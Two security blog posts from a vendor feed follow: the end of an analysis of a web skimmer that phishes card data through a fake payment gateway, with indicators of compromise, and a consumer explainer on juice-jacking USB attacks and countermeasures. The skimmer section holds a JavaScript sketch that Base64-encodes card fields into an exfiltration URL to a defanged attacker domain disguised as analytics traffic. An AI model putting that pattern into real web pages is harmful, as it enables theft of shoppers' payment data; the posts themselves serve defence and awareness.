Figure 5: Fake payment gateway page shown with its JavaScript that exfiltrates the data

Here’s how this works:

  • The fraudulent page will collect the credit card data entered by the victim and exfiltrate it via the payment-mastercard[.]com/ga.php?analytic={base64} URL
  • Right after, the victim is redirected to the real payment processor via the merchant’s migs_vpc module (MIGs VPC is an integrated payment service)
  • The legitimate payment site for Australia’s Commonwealth Bank is loaded and displays the total amount due for the purchase.
Figure 6: Web traffic showing data exfiltration process followed by redirect to legitimate PSP
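A minimal sketch of the exfiltration step above, assuming the skimmer serializes the captured form fields before Base64-encoding them. Note the source confirms only the ga.php?analytic={base64} endpoint pattern; the field names and payload shape below are assumptions:

```javascript
// Hypothetical sketch: field names and payload shape are assumptions.
// The campaign confirms only the endpoint pattern
// payment-mastercard[.]com/ga.php?analytic={base64}.
const stolen = {
  number: "4111111111111111", // industry test card number, not real data
  expiry: "12/23",
  cvv: "123",
  name: "J. Shopper",
};

// Serialize and Base64-encode the captured form data
const payload = Buffer.from(JSON.stringify(stolen)).toString("base64");

// The skimmer would then fire a request to a URL like this (domain defanged):
const exfilUrl = "https://payment-mastercard[.]com/ga.php?analytic=" + payload;
console.log(exfilUrl.split("?")[0]);
```

Disguising the exfiltration endpoint as a Google Analytics-style `ga.php` beacon helps the request blend in with ordinary analytics traffic in the browser’s network log.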

Here’s the final (and legitimate) payment page displayed to the victim. Note how the total amount due from the purchase on the compromised shop is carried over. This is done by creating a unique session ID and reading browser cookies.

Figure 7: Legitimate payment gateway page used for actual payment of goods

Web skimming in all different forms

Web skimming is a profitable criminal enterprise that shows no sign of slowing down, sparking authorities’ attention and action plans.

Externalizing payments shifts the burden and risk to the payment company: even if a merchant site were hacked, online shoppers would be redirected to a different site (e.g., PayPal, MasterCard, or Visa gateways) where they could enter their payment details securely.

Unfortunately, fraudsters are becoming incredibly creative in order to defeat those security defenses. By combining phishing-like techniques and inserting themselves in the middle, they can fool everyone.

Malwarebytes users are already protected against this particular scheme as the fraudulent infrastructure was already known to us.

Indicators of Compromise

payment-mastercard[.]com
google-query[.]com
google-analytics[.]top
google-smart[.]com
google-payment[.]com
jquery-assets[.]com
sagepay-live[.]com
payment-sagepay[.]com
payment-worldpay[.]com

124.156.34[.]157
47.245.55[.]198
5.53.124[.]235

The post Web skimmer phishes credit card data via rogue payment service platform appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Explained: juice jacking

Malware Bytes Security - Thu, 11/21/2019 - 11:00am

When your battery is dying and you’re nowhere near a power outlet, would you connect your phone to any old USB port? Joyce did, and her mobile phone got infected. How? Through a type of cyberattack called “juice jacking.” Don’t be like Joyce.

Although Joyce and her infected phone are hypothetical, juice jacking is technically possible. The attack uses a charging port or infected cable to exfiltrate data from the connected device or upload malware onto it. The term was first used by Brian Krebs in 2011 after a proof of concept was conducted at DEF CON by Wall of Sheep. When users plugged their phones into a free charging station, a message appeared on the kiosk screen saying:

“You should not trust public kiosks with your smart phone. Information can be retrieved or downloaded without your consent. Luckily for you, this station has taken the ethical route and your data is safe. Enjoy the free charge!”

As peak holiday travel season approaches, officials have issued public warnings about charging phones via USB using public charging stations in airports and hotels, as well as pluggable USB wall chargers, which are portable charging devices that can be plugged into an AC socket. However, this attack method has not been documented in the wild, outside of a few unconfirmed reports on the east coast and in the Washington, DC, area.

Instead of worrying about juice jacking this holiday season, we recommend you follow our guidance on best cybersecurity practices while traveling. We’ve also written articles on how to protect your Android, as well as how to protect your iOS phone.

Still, it’s best to be aware of potential modes of cyberattack—you never know what will trigger the transformation of the hypothetical to the real. To avoid inadvertently infecting your mobile device while charging your phone in public, learn more about how these attacks could happen and what you can do to prevent them.

How would juice jacking work?

As you may have noticed, when you charge your phone through the USB port of your computer or laptop, this also opens up the option to move files back and forth between the two systems. That’s because a USB port is not simply a power socket. A regular USB connector has five pins, where only one is needed to charge the receiving end. Two of the others are used by default for data transfers.

USB connection table courtesy of Sunrom

Unless you have made changes in your settings, data transfer mode is disabled by default, except on devices running older Android versions. The connection is only visible on the end that provides the power, which in the case of juice jacking is typically not the device owner. That means anytime a user connects to a USB port for a charge, they could also be opening up a pathway to move data between devices—a capability threat actors could abuse to steal data or install malware.

Types of juice jacking

There are two ways juice jacking could work:

  • Data theft: During the charge, data is stolen from the connected device.
  • Malware installation: As soon as the connection is established, malware is dropped on the connected device. The malware remains on the device until it is detected and removed by the user.
Data theft

In the first type of juice-jacking attack, cybercriminals could steal any and all data from mobile devices connected to charging stations through their USB ports. But there’s no hoodie-wearing hacker sitting behind the controls of the kiosk. So how would they get all your data from your phone to the charging station to their own servers? And if you charge for only a couple minutes, does that save you from losing everything?

Make no mistake, data theft can be fully automated. A cybercriminal could breach an unsecured kiosk using malware, then drop an additional payload that steals information from connected devices. There are crawlers that can search your phone for personally identifiable information (PII), account credentials, and banking-related or credit card data in seconds. There are also many malicious apps that can clone all of one phone’s data to another phone, using a Windows or Mac computer as a middleman. So, if that’s what’s hiding on the other end of the USB port, a threat actor could get all they need to impersonate you.

Cybercriminals are not necessarily targeting specific, high-profile users for data theft, either—though a threat actor would be extremely happy (and lucky) to fool a potential executive or government target into using a rigged charging station. However, the chances of that happening are rather slim. Instead, hackers know that our mobile devices store a lot of PII, which can be sold on the dark web for profit or re-used in social engineering campaigns.

Malware installation

The second type of juice-jacking attack would involve installing malware onto a user’s device through the same USB connection. This time, data theft isn’t always the end goal, though it often takes place in the service of other criminal activities. If threat actors were to steal data through malware installed on a mobile device, it wouldn’t happen upon USB connection but instead take place over time. This way, hackers could gather more and varied data, such as GPS locations, purchases made, social media interactions, photos, call logs, and other ongoing processes.

There are many categories of malware that cybercriminals could install through juice jacking, including adware, cryptominers, ransomware, spyware, or Trojans. In fact, Android malware nowadays is as versatile as malware aimed at Windows systems. While cryptominers hijack a mobile phone's CPU/GPU to mine cryptocurrency and drain its battery, ransomware freezes devices or encrypts files for ransom. Spyware allows for long-term monitoring and tracking of a target, and Trojans can hide in the background and serve up any number of other infections at will.

Many of today’s malware families are designed to hide from sight, so it’s possible users could be infected for a long time and not know it. Symptoms of a mobile phone infection include a quickly draining battery, icons for apps you didn’t download appearing on your screen, advertisements popping up in browsers or notification centers, or an unusually large cell phone bill. But sometimes infections leave no trace at all, which means prevention is all the more important.

Countermeasures

The first and most obvious way to avoid juice jacking is to stay away from public charging stations or portable wall chargers. Don’t let the panic of an almost drained battery get the best of you. I’m probably showing my age here, but I can keep going without my phone for hours. I’d rather not see the latest kitty meme if it means compromising the data on my phone.

If going without a phone is crazy talk and a battery charge is necessary to get you through the next leg of your travels, using a good old-fashioned AC socket (plug and outlet) will do the trick. No data transfer can take place while you charge—though it may be hard to find an empty outlet. While traveling, make sure you have the correct adapter for the various power outlet systems along your route. Note there are 15 major types of electrical outlet plugs in use today around the globe.

Other non-USB options include external batteries, wireless charging stations, and power banks, which are devices that can be charged to hold enough power for several recharges of your phone. Depending on the type and brand of power bank, they can hold between two and eight full charges. High-capacity power banks can cost more than US$100, but offer the option to charge multiple devices without having to look for a suitable power outlet.
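The "two to eight full charges" figure comes down to simple arithmetic: divide the bank's rated capacity by your phone's battery capacity, then discount for conversion losses. The sketch below shows that back-of-envelope calculation; the 70% efficiency factor and the capacity figures are illustrative assumptions, not measured values.

```python
def estimated_full_charges(bank_mah, phone_mah, efficiency=0.7):
    """Rough estimate of how many full phone charges a power bank provides.

    Voltage conversion and heat typically waste a chunk of a bank's rated
    capacity, so we apply an efficiency factor (0.7 here is an assumption).
    """
    return (bank_mah * efficiency) / phone_mah

# Illustrative numbers: a 10,000 mAh bank and a 3,000 mAh phone battery.
print(round(estimated_full_charges(10_000, 3_000), 1))
```

By the same math, a 30,000 mAh bank lands near the upper end of that two-to-eight range for a typical phone battery.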

If you still want the option to connect via USB, USB condoms are adapters that pass power through but don’t connect the data-transfer pins. You can attach one to your charging cable as an “always on” protection.

Image courtesy of int3.cc

Using such a USB data blocker, or “juice-jack defender” as they are sometimes called, will prevent accidental data exchange whenever your device is plugged into another device with a USB cable. This makes it a welcome travel companion, and it will only set you back US$10–$20.

Checking your phone’s USB preference settings may help, but it’s not a fool-proof solution. There have been cases where data transfers took place despite the “no data transfer” setting.

Finally, avoid using any charging cables and power banks that seem to have been left behind. You can compare this trick to the “lost USB stick” in the parking lot. You know you shouldn’t connect those to your computer, right? Consider any random technology left behind as suspect. Your phone will thank you for it.

Stay safe, everyone!

The post Explained: juice jacking appeared first on Malwarebytes Labs.
